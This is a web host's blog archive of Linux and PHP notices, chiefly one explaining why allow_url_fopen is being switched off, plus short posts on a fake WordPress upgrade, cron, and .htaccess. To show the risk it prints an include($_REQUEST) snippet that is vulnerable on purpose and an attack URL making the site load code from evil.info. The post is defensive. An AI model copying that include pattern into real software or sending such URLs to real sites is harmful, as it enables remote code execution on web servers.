Archive for the ‘Linux & PHP’ Category

Sheffield - Service Modifications 24/11/2008 onwards

Saturday, November 15th, 2008

Brief: On Monday November 24th we will be changing a php.ini configuration option on all of our shared hosting servers which may affect your website code.

Currently all Sheffield Linux servers run with the option allow_url_fopen=On. On November 24th we will be changing the option to allow_url_fopen=Off.

The reasons for this change and its impact are as follows…

With this option enabled, all of PHP’s file handling functions will accept a full URL as a parameter and will download that page and use it as a file. This is very convenient in a number of applications such as retrieving RSS feeds. Unfortunately it leads to unexpected results and serious security problems in many applications. For example in the following simple code…

$pagef = $_REQUEST["pagef"];
include ($pagef);

The programmer intends that the pagef request string will specify a file somewhere in the account to be included as part of the main page, to be called with a request like…

http://mydomain.com/display.php?pagef=footer.html

An attacker can create his own URL and exploit this page to download and execute his own code on your web site e.g.

http://mydomain.com/display.php?pagef=http://evil.info/exploit.txt

Expected Impact: By disabling the allow_url_fopen option, this attack vector is closed off while still allowing the intended function of such site code. The drawback is that other code which might for example use

readfile("http://feeds.feedburner.com/DilbertDailyStrip");

to retrieve a remote RSS feed will no longer work.
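The include pattern shown above, rewritten so that the request value only selects from a fixed list of page fragments; this does not depend on any php.ini setting and also refuses local paths that are not on the list. This is an added example, not Pipe Ten's code: it assumes PHP 7.1 or later, and the pages directory and fragment names are placeholders.

```php
<?php
// Added example, not the host's code. Directory and file names are assumptions.
const PAGE_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['footer.html', 'header.html', 'contact.html'];

/**
 * Return the absolute path for a requested page fragment, or null when the
 * value is not one of the known fragment names.
 */
function resolve_page($requested): ?string
{
    // Arrays (?pagef[]=x) and anything not on the list are rejected outright,
    // so URLs, "../" sequences and absolute paths never reach the filesystem.
    if (!is_string($requested) || !in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $requested);
    // Defence in depth: the resolved file must exist inside PAGE_DIR
    // (this catches a symlink placed in the directory).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$path = resolve_page($_GET['pagef'] ?? 'footer.html');
if ($path === null) {
    http_response_code(404);
    exit('Unknown page');
}
// readfile() sends the fragment as static output; unlike include() it does
// not execute any PHP the file may contain.
readfile($path);
```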

What you need to do: The supported alternative is Curl, which is available to PHP on all of our servers. Many popular applications will automatically fall back on the Curl functions; however, you may need to upgrade to the latest version of your web application. The PHP documentation for the Curl functions is available at http://www.php.net/manual/en/ref.curl.php
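A Curl-based replacement for the readfile() call above, restricted to http and https and with timeouts and certificate checks set explicitly. This is an added example, not taken from the announcement; fetch_url() is a hypothetical helper name and the code assumes PHP 7 or later with the curl extension loaded.

```php
<?php
// Added example. fetch_url() is a hypothetical helper, not a PHP built-in.
function fetch_url(string $url, int $timeout = 10): string
{
    // Refuse file://, ftp://, php:// and similar before touching the network.
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException('Only http(s) URLs are fetched');
    }

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,   // return the body instead of printing it
        CURLOPT_FOLLOWLOCATION  => true,
        CURLOPT_MAXREDIRS       => 3,
        // A redirect must not switch to another protocol either.
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT  => 5,
        CURLOPT_TIMEOUT         => $timeout,
        CURLOPT_SSL_VERIFYPEER  => true,
        CURLOPT_SSL_VERIFYHOST  => 2,
        CURLOPT_FAILONERROR     => true,   // treat HTTP 4xx/5xx as a failure
    ]);

    $body = curl_exec($ch);
    if ($body === false) {
        throw new RuntimeException('Fetch failed: ' . curl_error($ch));
    }
    return $body;
}

// Same effect as the readfile() call: the feed is written to the output.
// The response is data only; it is never passed to include() or eval().
try {
    echo fetch_url('http://feeds.feedburner.com/DilbertDailyStrip');
} catch (Exception $e) {
    error_log($e->getMessage());
}
```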

Security note for Wordpress users

Thursday, November 6th, 2008

“It looks like sites which have not upgraded to 2.6.3 are being exploited in an interesting way whereby a hacker, probably using an automated script, is hacking into sites with the vulnerability and changing the settings of one of the dashboard modules to point to a different feed thereby encouraging people to go to a different site which is offering a dodgy upgrade.”

That was the response of Peter Westwood (one of the lead developers of popular blogging software provider WordPress) to news that some of its users with an outdated WordPress installation may be prompted to download a compromised version from a spoof website (wordpresZ.org).

It’s important that all customers verify the source, security and legitimacy of any software that they install to their Pipe Ten hosting accounts and pay special attention when upgrading.

Read more at The Register - Fake site punts Trojanised WordPress and additional analysis at the sources blog.

.htaccess cheat sheet

Sunday, November 2nd, 2008

A quick cheat sheet for working with .htaccess files and Apache under Linux. Many of these options/features are also available via the control panel. (more…)

Creating a .htaccess file

Tuesday, October 21st, 2008

If you have a Linux web hosting plan then you can use the following instructions to create an .htaccess file: (more…)

My cron tab seems to be failing

Thursday, October 2nd, 2008

If they are PHP files intended to be called from the command line then the PHP binary should be used, at
/hsphere/shared/php4/bin/php

or
/hsphere/shared/php5/bin/php

If it is intended to use them as if they were in the web browser then wget should be used, available at /usr/share/wget
i.e.
/usr/share/wget -v --delete-after http://domain.com/path/to/script.php

For more instructions on how to configure crontabs please take a look at the following instructions: http://www.pipeten.info/h-sphere/direct_access_to_server.html#crontab

For other web server configurations please contact support

Free instant backup restores for Linux dedicated solutions

Thursday, July 24th, 2008

Combining the power of our control panel H-Sphere and primary backup solution R1Soft, we are pleased to announce free and instant backup restores for all Linux dedicated solution customers.

This beta functionality allows you to view all restore points (daily or four-hourly usually) and seeds for your server (the last full backup) then simply select what you’d like to restore and to where. There may be a 1 to 15 minute wait depending on what time of day it is.

Please contact support if you’d like to enable this option in your control panel.

Sheffield - Linux PHP5 Support

Thursday, June 19th, 2008

Due to popular request we now offer PHP5 support for Linux accounts at no additional cost. Customers wishing to take advantage of this should contact support through the usual methods requesting migration to a PHP5 specific server.

Free Crontabs and Scheduled Tasks with Pipe Ten

Thursday, April 24th, 2008

Pipe Ten now offer free crontabs on their Linux Venture, Multihost and Enterprise accounts. Windows Enterprise customers can now also create a free Scheduled Task to run a script on their website at a schedule of their choosing. Contact the support team for more details.

How do I show PHP errors on Linux?

Thursday, May 24th, 2007

You can tell PHP to show its errors by creating a .htaccess file in the root of your domain with the contents 'php_flag display_errors 1'. This will then show the errors when you visit the PHP page in question.

Can I use mod_rewrite?

Thursday, May 24th, 2007

mod_rewrite is enabled within Apache on our Linux servers as standard and just requires a .htaccess modification to turn the engine on for the domain.